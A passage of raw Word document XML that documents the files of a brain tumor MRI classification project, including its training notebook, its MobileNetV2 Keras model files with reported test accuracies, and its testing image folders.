        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Informs the preprocessing decisions codified in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>02_model_training.ipynb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>app.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Essential or Optional?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Essential for research verification, scientific auditability, and interview defense.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Failure Mode if Missing:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> The team would lack documented proof of dataset integrity and leakage-free validation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Creation Method:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Created interactively during initial exploratory research.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>3. `notebooks/02_model_training.ipynb`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>What it contains:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> The complete deep learning experimental lifecycle: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>tf.data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> input pipeline construction, data augmentation Sequential layers, MobileNetV2 architecture assembly, callback definitions, baseline training (80/20 split), full-dataset retraining (100% split), classification reports, confusion matrix heatmaps, and test-scan Grad-CAM visualization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Why it exists:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Serves as the laboratory where models are trained, evaluated, compared, and serialized.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Responsibility:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Produces the trained </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.keras</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> weight files stored in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>models/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Which other files use it:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Produces </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>models/brain_tumor_mobilenetv2_full_scratch.keras</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, which </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>app.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> loads.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Essential or Optional?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Essential.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Without this notebook, model weights cannot be reproduced or retrained.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Failure Mode if Missing:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Inability to retrain models, inspect training convergence curves, or alter hyperparameters.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Creation Method:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Created interactively during model development and experimentation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4. `models/brain_tumor_mobilenetv2_full_scratch.keras`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>What it contains:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> The compiled production neural network artifact saved in native Keras v3 format. Contains model architecture topology, optimizer state, and all 2,422,084 floating-point weight parameters.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Why it exists:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Stores the mathematical intelligence learned from all 5,600 training images, achieving 86.12% test accuracy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Responsibility:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Provides the pre-trained weights for instant inference in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>app.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Which other files use it:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Loaded by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>app.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>tf.keras.models.load_model()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Essential or Optional?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Essential.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Without this file, the application cannot perform inference without retraining for 15 minutes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Failure Mode if Missing:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>app.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> raises an error: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Model file not found</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Creation Method:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Automatically generated and saved by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ModelCheckpoint</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>02_model_training.ipynb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5. `models/brain_tumor_mobilenetv2_best.keras`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>What it contains:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> The baseline model artifact saved during the initial 80/20 validation split run (82.19% test accuracy).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Why it exists:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kept as a comparative scientific benchmark and automated fallback in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>app.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Responsibility:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Serves as a historical baseline proving the empirical benefit of full retraining.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Which other files use it:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Referenced in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>notebooks/02_model_training.ipynb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> for evaluation; fallback in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>app.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Essential or Optional?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Optional in production, but critical for scientific comparison.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Failure Mode if Missing:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>app.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> continues running seamlessly using the primary full model.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Creation Method:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Automatically generated by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ModelCheckpoint</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> during the first training experiment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>6. `dataset/Testing/`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>What it contains:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1,600 verified MRI images strictly divided into four subfolders: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>glioma/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (400), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>meningioma/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (400), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>notumor/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (400), and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
